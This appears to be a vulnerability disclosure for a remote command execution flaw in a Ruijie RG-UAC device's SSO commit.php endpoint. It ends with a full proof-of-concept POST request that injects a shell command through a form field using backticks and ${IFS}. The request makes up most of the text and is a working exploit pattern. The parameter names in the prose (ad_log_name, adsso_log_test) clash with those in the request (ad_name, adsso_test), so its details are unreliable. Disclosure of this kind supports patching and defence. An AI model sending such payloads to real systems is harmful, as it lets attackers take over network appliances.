Ruijie Network is a professional network manufacturer with a full range of network equipment products and solutions including switches, routers, software, security firewalls, wireless products, storage, etc.
There is a command execution vulnerability in Ruijie RG-UAC. Attackers exploit vulnerabilities to compromise servers.
official:https://www.ruijie.com.cn
version:1.0
url:/view/userAuthentication/SSO/commit.php
Key codes marked
satisfaction variable
($_REQUEST['type']=='adsso_log_test')
At the same time,$_POST ['ad_log_name'] can be controlled and directly substituted into exec, resulting in rce vulnerability
poc:
POST /view/userAuthentication/SSO/commit.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Connection: close
Cookie: PHPSESSID=c545dcdb0474795f9e421b4ac6d46bc9
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
ad_name=`sleep${IFS}10`&type=adsso_test
